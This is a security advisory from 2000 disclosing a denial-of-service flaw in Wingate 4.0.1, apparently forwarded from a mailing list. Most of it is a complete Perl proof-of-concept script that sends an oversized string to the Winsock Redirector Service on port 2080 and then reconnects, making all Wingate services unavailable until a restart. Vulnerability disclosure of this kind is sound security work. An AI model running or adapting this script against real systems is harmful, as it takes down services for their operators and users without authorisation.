================================================================= Blue Panda Vulnerability Announcement: Wingate 4.0.1 02/10/2000 (dd/mm/yyyy) bluepanda@dwarf.box.sk http://bluepanda.box.sk/ ================================================================= Problem: The Wingate engine can be disabled by sending an abnormal string to the Winsock Redirecter Service. The attack is not logged. Vulnerable: Wingate Home/Standard/Pro 4.0.1, possible prior versions (untested). Immune: Wingate 4.1 Beta A Vendor status: Notified. =================== Proof of concept: =================== #!/usr/bin/perl # # wgate401.pl - Wingate 4.0.1 denial-of-service # Blue Panda - bluepanda@dwarf.box.sk # http://bluepanda.box.sk/ # # ---------------------------------------------------------- # Disclaimer: this file is intended as proof of concept, and # is not intended to be used for illegal purposes. I accept # no responsibility for damage incurred by the use of it. # ---------------------------------------------------------- # # Causes all Wingate services to become unavailable until the Wingate Engine # is restarted. The Winsock Redirector Service must be enabled in order for # this to work. Tested on the evaluation version of Wingate Pro 4.0.1. # use IO::Socket; $host = "host.com"; $port = "2080"; $sleepfor = 1; print "Wingate 4.0.1 denial-of-service Blue Panda - bluepanda\@dwarf.box.sk http://bluepanda.box.sk/ ---------------------------------------------------------- Disclaimer: this file is intended as proof of concept, and is not intended to be used for illegal purposes. I accept no responsibility for damage incurred by the use of it. ---------------------------------------------------------- Causes all Wingate services to become unavailable until the Wingate Engine is restarted. The Winsock Redirector Service must be enabled in order for this to work.\n\n"; # Connect to the Winsock Redirector Service. print "Connecting to $host:$port..."; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n"; print "done.\n"; # Send some characters to the Winsock Redirector Service. $buffer = "a" x 1079; print $socket "$buffer"; # Wait a few seconds. $counter = 0; print "Sleeping for $sleepfor seconds."; while($counter < $sleepfor) { sleep(1); print "."; $counter += 1; } print "\n"; # Close the connection. The Winsock Redirector Service should now be # disabled. close($socket); # Connect once more to the Winsock Redirector Service. This will disable all # other services. print "Connecting to $host:$port..."; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n"; print "done.\n"; # Finished. close($socket); ----- End forwarded message -----